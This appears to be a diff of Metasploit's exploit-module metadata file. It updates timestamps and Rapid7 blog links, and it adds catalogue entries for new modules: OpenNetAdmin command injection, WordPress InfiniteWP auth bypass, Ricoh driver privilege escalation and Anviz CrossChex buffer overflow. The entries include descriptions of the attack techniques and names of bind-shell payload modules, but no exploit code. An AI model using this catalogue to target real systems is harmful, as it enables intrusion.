     "path": "/modules/exploits/unix/webapp/drupal_restws_unserialize.rb",
     "is_install_path": true,
     "ref_name": "unix/webapp/drupal_restws_unserialize",
@@ -87789,7 +87765,7 @@
       "URL-http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/",
       "URL-https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8",
       "URL-http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla"
+      "URL-https://blog.rapid7.com/2013/08/15/time-to-patch-joomla"
     ],
     "platform": "PHP",
     "arch": "php",
@@ -87812,7 +87788,7 @@
     "targets": [
       "Joomla 2.5.x <=2.5.13 / Joomla 3.x <=3.1.4"
     ],
-    "mod_time": "2018-08-20 15:43:07 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/unix/webapp/joomla_media_upload_exec.rb",
     "is_install_path": true,
     "ref_name": "unix/webapp/joomla_media_upload_exec",
@@ -88653,6 +88629,55 @@
     },
     "needs_cleanup": true
   },
+  "exploit_unix/webapp/opennetadmin_ping_cmd_injection": {
+    "name": "OpenNetAdmin Ping Command Injection",
+    "fullname": "exploit/unix/webapp/opennetadmin_ping_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-19",
+    "type": "exploit",
+    "author": [
+      "mattpascoe",
+      "Onur ER <onur@onurer.net>"
+    ],
+    "description": "This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.",
+    "references": [
+      "EDB-47691"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-02-21 15:47:32 +0000",
+    "path": "/modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/opennetadmin_ping_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/opensis_modname_exec": {
     "name": "OpenSIS 'modname' PHP Code Execution",
     "fullname": "exploit/unix/webapp/opensis_modname_exec",
@@ -91621,6 +91646,68 @@
     },
     "needs_cleanup": true
   },
+  "exploit_unix/webapp/wp_infinitewp_auth_bypass": {
+    "name": "WordPress InfiniteWP Client Authentication Bypass",
+    "fullname": "exploit/unix/webapp/wp_infinitewp_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-01-14",
+    "type": "exploit",
+    "author": [
+      "WebARX",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits an authentication bypass in the WordPress\n        InfiniteWP Client plugin to log in as an administrator and execute\n        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.\n\n        The module will attempt to retrieve the original PLUGIN_FILE contents\n        and restore them after payload execution. If VerifyContents is set,\n        which is the default setting, the module will check to see if the\n        restored contents match the original.\n\n        Note that a valid administrator username is required for this module.\n\n        WordPress >= 4.9 is currently not supported due to a breaking WordPress\n        API change. Tested against 4.8.3.",
+    "references": [
+      "WPVDB-10011",
+      "URL-https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/",
+      "URL-https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/",
+      "URL-https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "InfiniteWP Client < 1.9.4.5"
+    ],
+    "mod_time": "2020-03-02 14:15:52 +0000",
+    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/wp_infusionsoft_upload": {
     "name": "Wordpress InfusionSoft Upload Vulnerability",
     "fullname": "exploit/unix/webapp/wp_infusionsoft_upload",
@@ -92072,7 +92159,7 @@
     "targets": [
       "WordPress"
     ],
-    "mod_time": "2019-11-28 20:13:21 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
     "path": "/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb",
     "is_install_path": true,
     "ref_name": "unix/webapp/wp_plainview_activity_monitor_rce",
@@ -94796,7 +94883,7 @@
       "URL-http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/",
       "URL-https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html",
       "URL-http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
+      "URL-https://blog.rapid7.com/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
       "URL-http://www.adobe.com/support/security/bulletins/apsb12-18.html"
     ],
     "platform": "Windows",
@@ -94817,7 +94904,7 @@
       "IE 8 on Windows 7 SP1",
       "IE 9 on Windows 7 SP1"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/adobe_flash_otf_font.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/adobe_flash_otf_font",
@@ -94938,7 +95025,7 @@
       "BID-53395",
       "URL-http://www.adobe.com/support/security/bulletins/apsb12-09.html",
       "URL-http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
+      "URL-https://blog.rapid7.com/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
     ],
     "platform": "Windows",
     "arch": "",
@@ -94955,7 +95042,7 @@
       "IE 7 on Windows XP SP3",
       "IE 8 on Windows XP SP3 with msvcrt ROP"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/adobe_flash_rtmp.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/adobe_flash_rtmp",
@@ -97004,7 +97091,7 @@
       "OSVDB-81443",
       "ZDI-12-113",
       "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21591705",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/07/11/it-isnt-always-about-buffer-overflow"
+      "URL-https://blog.rapid7.com/2012/07/11/it-isnt-always-about-buffer-overflow"
     ],
     "platform": "Windows",
     "arch": "",
@@ -97019,7 +97106,7 @@
       "Automatic",
       "IE 6 / IE7 (No DEP)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/clear_quest_cqole.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/clear_quest_cqole",
@@ -97728,7 +97815,7 @@
       "CVE-2013-0108",
       "OSVDB-90583",
       "BID-58134",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi",
+      "URL-https://blog.rapid7.com/2013/03/11/cve-2013-0108-honeywell-ebi",
       "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf"
     ],
     "platform": "Windows",
@@ -97743,7 +97830,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/honeywell_hscremotedeploy_exec",
@@ -98400,7 +98487,7 @@
       "URL-http://technet.microsoft.com/en-us/security/advisory/2794220",
       "URL-http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx",
       "URL-http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
+      "URL-https://blog.rapid7.com/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
     ],
     "platform": "Windows",
     "arch": "",
@@ -98418,7 +98505,7 @@
       "IE 8 on Windows Server 2003",
       "IE 8 on Windows 7"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 09:26:29 +0000",
     "path": "/modules/exploits/windows/browser/ie_cbutton_uaf.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/ie_cbutton_uaf",
@@ -98652,7 +98739,7 @@
       "MSB-MS13-080",
       "URL-http://technet.microsoft.com/en-us/security/advisory/2887505",
       "URL-http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
+      "URL-https://blog.rapid7.com/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
     ],
     "platform": "Windows",
     "arch": "",
@@ -98668,7 +98755,7 @@
       "Windows 7 with Office 2007|2010",
       "Windows XP with IE 8"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/ie_setmousecapture_uaf",
@@ -101670,7 +101757,7 @@
       "OSVDB-82865",
       "URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/",
       "URL-https://twitter.com/binjo/status/212795802974830592",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
+      "URL-https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
     ],
     "platform": "Windows",
     "arch": "",
@@ -101687,7 +101774,7 @@
       "IE 8 on Windows XP SP3 with JRE ROP",
       "IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/ms12_037_same_id.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/ms12_037_same_id",
@@ -102349,7 +102436,7 @@
       "MSB-MS12-043",
       "URL-http://technet.microsoft.com/en-us/security/advisory/2719615",
       "URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
+      "URL-https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
     ],
     "platform": "Windows",
     "arch": "",
@@ -102369,7 +102456,7 @@
       "IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
       "IE 9 with Java 6 on Windows 7 SP1"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/msxml_get_definition_code_exec",
@@ -103015,7 +103102,7 @@
       "OSVDB-81439",
       "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05",
       "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
+      "URL-https://blog.rapid7.com/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
     ],
     "platform": "Windows",
     "arch": "",
@@ -103033,7 +103120,7 @@
       "IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2",
       "IE 9 with Java 6 on Windows 7 SP1"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/oracle_autovue_setmarkupmode",
@@ -104273,7 +104360,7 @@
       "Windows XP SP0-SP3 + JAVA + DEP bypass (IE8)",
       "Windows 7 + JAVA + DEP bypass (IE8)"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
     "path": "/modules/exploits/windows/browser/teechart_pro.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/teechart_pro",
@@ -110912,7 +110999,7 @@
       "MSB-MS13-071",
       "BID-62176",
       "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell"
+      "URL-https://blog.rapid7.com/2013/09/25/change-the-theme-get-a-shell"
     ],
     "platform": "Windows",
     "arch": "",
@@ -110926,7 +111013,7 @@
     "targets": [
       "Windows XP SP3 / Windows 2003 SP2"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ms13_071_theme",
@@ -113112,7 +113199,7 @@
     "targets": [
       "VLC 1.1.8 on Windows XP SP3"
     ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
     "path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/vlc_modplug_s3m",
@@ -120880,7 +120967,7 @@
     ],
     "description": "This module exploits a command injection vulnerability\n        discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n        and 11.30). The vulnerability exists in the DNS Tool allowing an\n        attacker to execute arbitrary commands in the context of the service. By\n        default, HP SiteScope installs and runs as SYSTEM in Windows and does\n        not require authentication. This vulnerability only exists on the\n        Windows version. The Linux version is unaffected.",
     "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
+      "URL-https://blog.rapid7.com/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
       "URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html"
     ],
     "platform": "Windows",
@@ -120905,7 +120992,7 @@
       "HP SiteScope 11.30 / Microsoft Windows 7 and higher",
       "HP SiteScope 11.30 / CMD"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb",
     "is_install_path": true,
     "ref_name": "windows/http/hp_sitescope_dns_tool",
@@ -122096,7 +122183,7 @@
     ],
     "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n        uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n        ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n        inject a null bye at the end of the value to create a malicious file with an arbitrary\n        file type, and then place it under a directory that allows server-side scripts to run,\n        which results in remote code execution under the context of SYSTEM.\n\n        Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n        but older ones run on port 8040. Also, using this exploit will leave debugging information\n        produced by FileUploadServlet in file rdslog0.txt.\n\n        This exploit was successfully tested on version 9, build 90109 and build 91084.",
     "references": [
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
+      "URL-https://blog.rapid7.com/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
       "CVE-2015-8249"
     ],
     "platform": "Windows",
@@ -122120,7 +122207,7 @@
     "targets": [
       "ManageEngine Desktop Central 9 on Windows"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb",
     "is_install_path": true,
     "ref_name": "windows/http/manageengine_connectionid_write",
@@ -122614,7 +122701,7 @@
     "targets": [
       "Universal Windows Target"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
     "path": "/modules/exploits/windows/http/novell_imanager_upload.rb",
     "is_install_path": true,
     "ref_name": "windows/http/novell_imanager_upload",
@@ -129043,7 +129130,7 @@
       "phra",
       "lupman"
     ],
-    "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n        to achieve a SYSTEM handle for elevation of privilege.\n        It requires a CLSID string.",
+    "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n        to achieve a SYSTEM handle for elevation of privilege.\n        It requires a CLSID string.\n        Windows 10 after version 1803, (April 2018 update, build 17134) and all\n        versions of Windows Server 2019 are not vulnerable.",
     "references": [
       "MSB-MS16-075",
       "CVE-2016-3225",
@@ -129065,7 +129152,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-01-12 04:32:21 +0000",
+    "mod_time": "2020-02-21 08:33:20 +0000",
     "path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb",
     "is_install_path": true,
     "ref_name": "windows/local/ms16_075_reflection_juicy",
@@ -129935,6 +130022,57 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/local/ricoh_driver_privesc": {
+    "name": "Ricoh Driver Privilege Escalation",
+    "fullname": "exploit/windows/local/ricoh_driver_privesc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-01-22",
+    "type": "exploit",
+    "author": [
+      "Alexander Pudwill",
+      "Pentagrid AG",
+      "Shelby Pace"
+    ],
+    "description": "Various Ricoh printer drivers allow escalation of\n        privileges on Windows systems.\n\n        For vulnerable drivers, a low-privileged user can\n        read/write files within the `RICOH_DRV` directory\n        and its subdirectories.\n\n        `PrintIsolationHost.exe`, a Windows process running\n        as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n        during the installation of a printer. A user can\n        elevate to SYSTEM by writing a malicious DLL to\n        the vulnerable driver directory and adding a new\n        printer with a vulnerable driver.\n\n        This module leverages the `prnmngr.vbs` script\n        to add and delete printers. Multiple runs of this\n        module may be required given successful exploitation\n        is time-sensitive.",
+    "references": [
+      "CVE-2019-19363",
+      "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2020-02-06 14:11:42 +0000",
+    "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/ricoh_driver_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "service-resource-loss"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_windows/local/run_as": {
     "name": "Windows Run Command As User",
     "fullname": "exploit/windows/local/run_as",
@@ -130966,7 +131104,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-04-25 18:24:26 +0000",
+    "mod_time": "2020-02-26 10:39:50 +0000",
     "path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/misc/ais_esel_server_rce",
@@ -132012,6 +132150,50 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/misc/crosschex_device_bof": {
+    "name": "Anviz CrossChex Buffer Overflow",
+    "fullname": "exploit/windows/misc/crosschex_device_bof",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-11-28",
+    "type": "exploit",
+    "author": [
+      "Luis Catarino <lcatarino@protonmail.com>",
+      "Pedro Rodrigues <pedrosousarodrigues@protonmail.com>",
+      "agalway-r7",
+      "adfoster-r7"
+    ],
+    "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n        triggering a stack buffer overflow.",
+    "references": [
+      "CVE-2019-12518",
+      "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html",
+      "EDB-47734"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Crosschex Standard x86 <= V4.3.12"
+    ],
+    "mod_time": "2020-02-18 23:18:45 +0000",
+    "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/crosschex_device_bof",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/misc/disk_savvy_adm": {
     "name": "Disk Savvy Enterprise v10.4.18",
     "fullname": "exploit/windows/misc/disk_savvy_adm",
@@ -132836,7 +133018,7 @@
       "CVE-2012-0124",
       "OSVDB-80105",
       "BID-52431",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
+      "URL-https://blog.rapid7.com/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
     ],
     "platform": "Windows",
     "arch": "",
@@ -132851,7 +133033,7 @@
       "HP Data Protector Express 6.0.00.11974 / Windows XP SP3",
       "HP Data Protector Express 5.0.00.59287 / Windows XP SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb",
     "is_install_path": true,
     "ref_name": "windows/misc/hp_dataprotector_new_folder",
@@ -136180,7 +136362,7 @@
     "references": [
       "CVE-2012-4959",
       "OSVDB-87573",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
     ],
     "platform": "Windows",
     "arch": "",
@@ -136203,7 +136385,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb",
     "is_install_path": true,
     "ref_name": "windows/novell/file_reporter_fsfui_upload",
@@ -138650,7 +138832,7 @@
     "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n        exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.",
     "references": [
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
       "CVE-2014-0784"
     ],
     "platform": "Windows",
@@ -138665,7 +138847,7 @@
     "targets": [
       "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/yokogawa_bkbcopyd_bof",
@@ -138692,7 +138874,7 @@
     "description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability\n        exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n        insecure usage of memcpy, using attacker controlled data as the size count. This module\n        has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n        2003 SP2.",
     "references": [
       "CVE-2014-0782",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf"
     ],
     "platform": "Windows",
@@ -138707,7 +138889,7 @@
     "targets": [
       "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/yokogawa_bkesimmgr_bof",
@@ -138736,7 +138918,7 @@
       "CVE-2014-3888",
       "URL-http://jvn.jp/vu/JVNVU95045914/index.html",
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
+      "URL-https://blog.rapid7.com/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
     ],
     "platform": "Windows",
     "arch": "",
@@ -138750,7 +138932,7 @@
     "targets": [
       "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3"
     ],
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/yokogawa_bkfsim_vhfd",
@@ -138777,7 +138959,7 @@
     "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n        exists in the service BKHOdeq.exe when handling specially crafted packets. This module has\n        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n        2003 SP2.",
     "references": [
       "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
       "CVE-2014-0783"
     ],
     "platform": "Windows",
@@ -138792,7 +138974,7 @@
     "targets": [
       "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/scada/yokogawa_bkhodeq_bof",
@@ -144224,7 +144406,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-01-03 18:43:51 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_busybox_telnetd",
@@ -144257,7 +144439,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_inetd",
@@ -144326,7 +144508,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-01-14 17:34:47 +0000",
+    "mod_time": "2020-02-16 12:11:28 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_lua",
@@ -144361,7 +144543,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_netcat",
@@ -144394,7 +144576,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
     "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
     "is_install_path": true,
     "ref_name": "cmd/unix/bind_netcat_gaping",
